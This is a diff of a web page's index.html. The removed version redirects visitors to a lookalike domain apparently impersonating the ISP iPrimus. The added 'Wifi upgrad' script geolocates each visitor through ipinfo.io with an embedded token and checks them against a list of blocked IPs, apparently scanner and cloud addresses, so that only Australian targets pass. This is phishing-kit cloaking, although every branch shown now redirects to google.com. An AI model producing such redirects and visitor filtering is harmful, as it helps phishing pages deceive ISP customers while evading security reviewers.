--- a/index.html
+++ b/index.html
@@ -1,7 +1,58 @@
 <!DOCTYPE html>
-<html>
-  <head>
-    <meta http-equiv="refresh" content="0; URL='https://iprimus-comau.othserviceconnect.com/'" />
-    <title>iPrimus</title>
-  </head>
+<html lang="en">
+<head>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>Wifi upgrad</title>
+  <script>
+    const allowedCountry = 'AU';
+    const token = "3a5e08c892d837";
+
+const blockedIPs = [
+  "103.17.196.155", "104.210.79.75", "104.28.108.0", "104.28.125.4", "104.28.35.3",
+  "104.28.35.4", "106.161.65.206", "128.90.177.209", "128.90.63.191", "138.199.22.183",
+  "138.199.59.", "149.154.161", "149.154.161.", "149.154.161.xxx", "149.88.101.20",
+  "154.16.81.84", "154.47.78.xxx", "159.148.128.163", "16.50.232.14", "173.239.194.229",
+  "173.239.194.27", "173.239.203.152", "185.18.222.147", "198.44.133.53", "20.28.16.4",
+  "212.102.63.", "212.102.63.xxx", "212.143.94.254", "212.6.82.", "212.6.82.xxx",
+  "217.64.126.104", "217.64.126.150", "31.217.248.", "31.217.248.xxx", "34.235.48.77",
+  "35.88.70.185", "35.89.14.236", "35.90.31.108", "35.241.237.xxx", "40.80.158.10",
+  "44.243.20.38", "48.215.3.146", "5.62.21.xxx", "52.243.103.225", "54.156.251.192",
+  "54.200.5.221", "54.209.60.63", "68.218.165.136", "68.218.165.140", "74.80.181.154",
+  "82.102.31.156", "85.208.139.205", "85.254.40.226", "89.248.171.", "89.248.171.xxx",
+  "96.0.0.81", "142.252.248.249", "38.18.1.205", "52.167.144.20", "91.242.215.81"
+];
+
+
+
+    async function checkAccess() {
+      try {
+        const ipResponse = await fetch(`https://ipinfo.io/json?token=${token}`);
+        const ipData = await ipResponse.json();
+
+        const ip = ipData.ip;
+        const country = ipData.country;
+
+        console.log("User IP:", ip);
+        console.log("Country:", country);
+
+        const isBlocked = blockedIPs.some(blocked => {
+          return blocked.endsWith('.xxx') ? ip.startsWith(blocked.replace('.xxx', '')) : ip === blocked;
+        });
+
+        if (country === allowedCountry && !isBlocked) {
+          window.location.href = "https://www.google.com";
+        } else {
+          window.location.href = "https://www.google.com/";
+        }
+
+      } catch (error) {
+        console.error("Error:", error);
+        window.location.href = "https://www.google.com/";
+      }
+    }
+
+    window.onload = checkAccess;
+  </script>
+</head>
 </html>
